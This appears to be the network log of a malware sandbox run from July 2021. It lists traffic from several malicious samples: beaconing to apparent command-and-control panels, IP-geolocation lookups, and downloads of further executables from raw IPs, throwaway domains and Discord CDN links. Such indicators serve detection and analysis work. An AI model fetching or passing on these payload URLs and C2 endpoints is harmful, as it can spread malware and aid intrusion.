                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        Answers:
                                                                                                                                                                                        whoami: f8e4e9484cf4a972cde7979fdabba638cb2f344f646867b2abc4b52cdbc04451
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        84.40.106.91
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        91.203.174.38
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        1.247.35.250
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        121.67.142.131
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        211.53.230.69
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        118.129.116.119
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        61.253.197.172
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        121.67.118.220
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        196.200.111.5
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        123.215.94.239
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        84.40.106.91:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 130
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:37:41 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 7
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:37:42 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:38:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8

• flag-unknown
POST
http://185.215.113.55/t5BnOoke2/index.php
nrbux.exe
Remote address:
185.215.113.55:80
Request
POST /t5BnOoke2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.55
Content-Length: 84
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:39:43 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8

• flag-unknown
POST
http://185.215.113.55/t5BnOoke2/index.php?scr=1
nrbux.exe
Remote address:
185.215.113.55:80
Request
POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----a66c74a3a92acc11cfdd08dd2aaf5e27
Host: 185.215.113.55
Content-Length: 89467
Cache-Control: no-cache

• flag-unknown
POST
http://87.251.71.195:82/
arnatic_7.exe
Remote address:
87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 87.251.71.195:82
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

• flag-unknown
POST
http://185.215.113.55/t5BnOoke2/index.php
nrbux.exe
Remote address:
185.215.113.55:80
Request
POST /t5BnOoke2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.55
Content-Length: 84
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:40:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8

• flag-unknown
POST
http://87.251.71.195:82/
arnatic_7.exe
Remote address:
87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 87.251.71.195:82
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

• flag-unknown
POST
http://87.251.71.195:82/
arnatic_7.exe
Remote address:
87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 87.251.71.195:82
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

• flag-unknown
POST
http://87.251.71.195:82/
arnatic_7.exe
Remote address:
87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 87.251.71.195:82
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

• flag-unknown
POST
http://185.215.113.55/t5BnOoke2/index.php
nrbux.exe
Remote address:
185.215.113.55:80
Request
POST /t5BnOoke2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.55
Content-Length: 84
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:41:45 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8

• flag-unknown
POST
http://185.215.113.55/t5BnOoke2/index.php
nrbux.exe
Remote address:
185.215.113.55:80
Request
POST /t5BnOoke2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.55
Content-Length: 84
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:42:46 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8

• flag-unknown
POST
http://185.215.113.55/t5BnOoke2/index.php?scr=1
nrbux.exe
Remote address:
185.215.113.55:80
Request
POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----004x�f�1��f��f89254dee9ea36ffa3d24717b0adfb362ae6
Host: 185.215.113.55
Content-Length: 89500
Cache-Control: no-cache

• flag-unknown
POST
http://87.251.71.195:82/
arnatic_7.exe
Remote address:
87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 87.251.71.195:82
Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:43:46 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • 104.21.12.59:80
                                                                                                                                                                                        http://motiwa.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4&oname[]=25June325AM&oname[]=7&oname[]=1&oname[]=2&oname[]=3&oname[]=4&oname[]=5&oname[]=6&cnt=7
                                                                                                                                                                                        http
                                                                                                                                                                                        setup_install.exe
                                                                                                                                                                                        657 B
                                                                                                                                                                                        13.2kB
                                                                                                                                                                                        10
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://motiwa.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4&oname[]=25June325AM&oname[]=7&oname[]=1&oname[]=2&oname[]=3&oname[]=4&oname[]=5&oname[]=6&cnt=7

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 208.95.112.1:80
                                                                                                                                                                                        http://ip-api.com/json/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        958 B
                                                                                                                                                                                        859 B
                                                                                                                                                                                        10
                                                                                                                                                                                        9

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://ip-api.com/json/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 136.144.41.133:80
                                                                                                                                                                                        http://136.144.41.133/server.txt
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        479 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        6
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://136.144.41.133/server.txt
                                                                                                                                                                                      • 172.67.201.250:443
                                                                                                                                                                                        https://videoconvert-download38.xyz/?user=newpb1_6
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        16.7kB
                                                                                                                                                                                        781.2kB
                                                                                                                                                                                        344
                                                                                                                                                                                        661

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://videoconvert-download38.xyz/?user=newpb1_1

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://videoconvert-download38.xyz/?user=newpb1_2

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://videoconvert-download38.xyz/?user=newpb1_3

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://videoconvert-download38.xyz/?user=newpb1_4

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://videoconvert-download38.xyz/?user=newpb1_5

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://videoconvert-download38.xyz/?user=newpb1_6

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 157.240.240.35:443
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        10.9kB
                                                                                                                                                                                        450.3kB
                                                                                                                                                                                        202
                                                                                                                                                                                        359

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://www.facebook.com/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://www.facebook.com/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 172.67.182.129:443
                                                                                                                                                                                        https://iphonemoney.xyz/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        7398983.exe
                                                                                                                                                                                        43.5kB
                                                                                                                                                                                        2.2MB
                                                                                                                                                                                        869
                                                                                                                                                                                        1711

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://iphonemoney.xyz/api.php?getusers

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://iphonemoney.xyz/api.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST https://iphonemoney.xyz/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        874 B
                                                                                                                                                                                        452 B
                                                                                                                                                                                        11
                                                                                                                                                                                        11

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 74.114.154.22:443
                                                                                                                                                                                        https://sergeevih43.tumblr.com/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_1.exe
  sent 1.0kB / received 5.9kB, packets 15 / 13
  HTTP Request: GET https://sergeevih43.tumblr.com/
• 208.95.112.1:80  http://ip-api.com/json/?fields=8198  (http, SystemNetworkService)  sent 844 B / received 686 B, packets 12 / 11
  HTTP Request: GET http://ip-api.com/json/?fields=8198
  HTTP Response: 200
• 88.218.92.148:80  http://uyg5wye.2ihsfa.com/api/?sid=290613&key=d7f614e3c3e5f3d02ab84fc794796c5b  (http, arnatic_4.exe)  sent 1.3kB / received 943 B, packets 10 / 10
  HTTP Request: GET http://uyg5wye.2ihsfa.com/api/fbtime
  HTTP Response: 200
  HTTP Request: POST http://uyg5wye.2ihsfa.com/api/?sid=290613&key=d7f614e3c3e5f3d02ab84fc794796c5b
  HTTP Response: 200
• 104.21.21.221:80  http://iw.gamegame.info/report7.4.php  (http, SystemNetworkService)  sent 1.2kB / received 13.8kB, packets 14 / 13
  HTTP Request: POST http://iw.gamegame.info/report7.4.php
  HTTP Response: 403
• 104.21.54.72:443  https://download-serv-235442.xyz/  (tls, http, 4460127.exe)  sent 5.1kB / received 5.2kB, packets 14 / 16
  HTTP Request: GET https://download-serv-235442.xyz/api.php
  HTTP Response: 200
  HTTP Request: POST https://download-serv-235442.xyz/
  HTTP Response: 200
• 88.99.66.31:443  https://iplogger.org/1SPHi7  (tls, http, arnatic_5.exe)  sent 812 B / received 6.3kB, packets 9 / 10
  HTTP Request: GET https://iplogger.org/1SPHi7
  HTTP Response: 200
• 104.21.46.30:443  https://pcfixmy-download-13.xyz/  (tls, http, 3466090.exe)  sent 46.1kB / received 2.2MB, packets 926 / 1799
  HTTP Request: GET https://pcfixmy-download-13.xyz/api.php?getusers
  HTTP Response: 200
  HTTP Request: GET https://pcfixmy-download-13.xyz/api.php
  HTTP Response: 200
  HTTP Request: POST https://pcfixmy-download-13.xyz/
  HTTP Response: 200
• 88.99.66.31:443  https://iplogger.org/1vpFz7  (tls, http, arnatic_5.exe)  sent 548 B / received 1.2kB, packets 5 / 5
  HTTP Request: GET https://iplogger.org/1vpFz7
  HTTP Response: 200
• 104.21.21.221:80  http://iw.gamegame.info/report7.4.php  (http, SystemNetworkService)  sent 1.2kB / received 13.8kB, packets 14 / 13
  HTTP Request: POST http://iw.gamegame.info/report7.4.php
  HTTP Response: 403
• 136.144.41.201:80  http://136.144.41.201/server.txt  (http, arnatic_6.exe)  sent 663 B / received 674 B, packets 10 / 9
  HTTP Request: GET http://136.144.41.201/server.txt
  HTTP Response: 200
• 34.117.59.81:443  https://ipinfo.io/widget  (tls, http, arnatic_6.exe)  sent 1.2kB / received 6.7kB, packets 14 / 16
  HTTP Request: GET https://ipinfo.io/widget
  HTTP Response: 200
• 79.174.12.174:80  http://79.174.12.174/base/api/getData.php  (http, arnatic_6.exe)  sent 3.6kB / received 6.0kB, packets 25 / 26
  HTTP Request: POST http://79.174.12.174/base/api/getData.php
  HTTP Response: 200
  HTTP Request: POST http://79.174.12.174/base/api/getData.php
  HTTP Response: 200
  HTTP Request: POST http://79.174.12.174/base/api/getData.php
  HTTP Response: 200
  HTTP Request: POST http://79.174.12.174/base/api/getData.php
  HTTP Response: 200
  HTTP Request: POST http://79.174.12.174/base/api/getData.php
  HTTP Response: 200
  HTTP Request: POST http://79.174.12.174/base/api/getData.php
  HTTP Response: 200
• 136.144.41.201:80  http://136.144.41.201/WW/file4.exe  (http, arnatic_6.exe)  sent 65.0kB / received 1.6MB, packets 1400 / 1398

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://136.144.41.201/WW/file2.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://136.144.41.201/WW/file6.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://136.144.41.201/WW/file4.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 136.144.41.201:80
                                                                                                                                                                                        http://136.144.41.201/WW/file3.exe
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        36.2kB
                                                                                                                                                                                        867.1kB
                                                                                                                                                                                        769
                                                                                                                                                                                        769

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://136.144.41.201/WW/file4.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://136.144.41.201/WW/file3.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://136.144.41.201/WW/file2.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://136.144.41.201/WW/file3.exe
                                                                                                                                                                                      • 185.20.227.194:80
                                                                                                                                                                                        http://185.20.227.194/install.exe
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        390 B
                                                                                                                                                                                        92 B
                                                                                                                                                                                        4
                                                                                                                                                                                        2

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://185.20.227.194/install.exe
                                                                                                                                                                                      • 89.221.213.3:80
                                                                                                                                                                                        http://www.quickfastfuriousloaded.com/campaign1/SunLabsPlayer.exe
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        422 B
                                                                                                                                                                                        92 B
                                                                                                                                                                                        4
                                                                                                                                                                                        2

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://www.quickfastfuriousloaded.com/campaign1/SunLabsPlayer.exe
                                                                                                                                                                                      • 104.21.65.45:80
                                                                                                                                                                                        jom.diregame.live
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        408 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 172.67.202.130:80
                                                                                                                                                                                        http://fikerty.info/app.exe
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        991 B
                                                                                                                                                                                        1.9kB
                                                                                                                                                                                        13
                                                                                                                                                                                        11

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://fikerty.info/app.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        302

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://fikerty.info/app.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        302
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        409 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        409 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 176.99.131.168:80
                                                                                                                                                                                        http://name-usa.info/app/files/dc/id27315003/compan.exe
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        45.7kB
                                                                                                                                                                                        1.2MB
                                                                                                                                                                                        984
                                                                                                                                                                                        982

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://name-usa.info/app/files/dc/id27315003/compan.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://name-usa.info/app/files/dc/id27315003/compan.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        409 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 104.21.65.45:80
                                                                                                                                                                                        jom.diregame.live
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        360 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        tls
  arnatic_6.exe
  409 B
  488 B
  5
  4
• 172.67.155.53:443
  https://fackerty.info/app.exe
  tls, http
  arnatic_6.exe
  1.0kB
  4.9kB
  11
  10
  HTTP Request: HEAD https://fackerty.info/app.exe
  HTTP Response: 403
• 162.159.135.233:80
  cdn.discordapp.com
  tls
  arnatic_6.exe
  409 B
  488 B
  5
  4
• 162.159.135.233:80
  cdn.discordapp.com
  tls
  arnatic_6.exe
  409 B
  488 B
  5
  4
• 104.21.65.45:80
  jom.diregame.live
  arnatic_6.exe
  144 B
  132 B
  3
  3
• 104.21.65.45:443
  https://jom.diregame.live/userf/2201/google-game.exe
  tls, http
  arnatic_6.exe
  1.4kB
  18.1kB
  20
  19
  HTTP Request: GET https://jom.diregame.live/userf/2201/google-game.exe
  HTTP Response: 403
• 162.159.135.233:80
  cdn.discordapp.com
  tls
  arnatic_6.exe
  361 B
  488 B
  5
  4
• 162.159.135.233:80
  cdn.discordapp.com
  tls
  arnatic_6.exe
  361 B
  488 B
  5
  4
• 162.159.135.233:80
  cdn.discordapp.com
  tls
  arnatic_6.exe
  315 B
  92 B
  4
  2
• 162.159.135.233:80
  cdn.discordapp.com
  tls
  arnatic_6.exe
  361 B
  488 B
  5
  4
• 89.221.213.3:80
  http://www.quickfastfuriousloaded.com/campaign1/SunLabsPlayer.exe
  http
  arnatic_6.exe
  513 B
  172 B
  6
  4
  HTTP Request: GET http://www.quickfastfuriousloaded.com/campaign1/SunLabsPlayer.exe
• 185.20.227.194:80
  http://185.20.227.194/install.exe
  http
  arnatic_6.exe
  481 B
  172 B
  6
  4
  HTTP Request: GET http://185.20.227.194/install.exe
• 162.159.135.233:80
  cdn.discordapp.com
  tls
  arnatic_6.exe
  361 B
  488 B
  5
  4
• 172.67.155.53:443
  https://fackerty.info/app.exe
  tls, http
  arnatic_6.exe
  1.5kB
  15.4kB
  19
  18
  HTTP Request: GET https://fackerty.info/app.exe
  HTTP Response: 403
• 162.159.135.233:80
  cdn.discordapp.com
  tls
  arnatic_6.exe
  361 B
  488 B
  5
  4
• 162.159.135.233:80
  cdn.discordapp.com
  arnatic_6.exe
  144 B
  132 B
  3
  3
• 162.159.135.233:80
  cdn.discordapp.com
  arnatic_6.exe
  144 B
  132 B
  3
  3
• 162.159.135.233:443
  https://cdn.discordapp.com/attachments/855697945679888404/860411180802899998/file2.bmp
  tls, http
  arnatic_6.exe
  28.5kB
  662.6kB
  607
  606
  HTTP Request: GET https://cdn.discordapp.com/attachments/855697945679888404/860411180802899998/file2.bmp
  HTTP Response: 200
• 162.159.135.233:80
  cdn.discordapp.com
  arnatic_6.exe
  144 B
  132 B
  3
  3
• 162.159.135.233:80
  cdn.discordapp.com
  arnatic_6.exe
  144 B
  132 B
  3
  3
• 162.159.135.233:443
  https://cdn.discordapp.com/attachments/855697945679888404/859709260588646410/ChromeExtract.bmp
  tls, http
  arnatic_6.exe
  13.4kB
  307.3kB
  280
  279
  HTTP Request: GET https://cdn.discordapp.com/attachments/855697945679888404/859709260588646410/ChromeExtract.bmp
  HTTP Response: 200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        786 B
                                                                                                                                                                                        465 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        764 B
                                                                                                                                                                                        833 B
                                                                                                                                                                                        6
                                                                                                                                                                                        6

                                                                                                                                                                                        HTTP Request

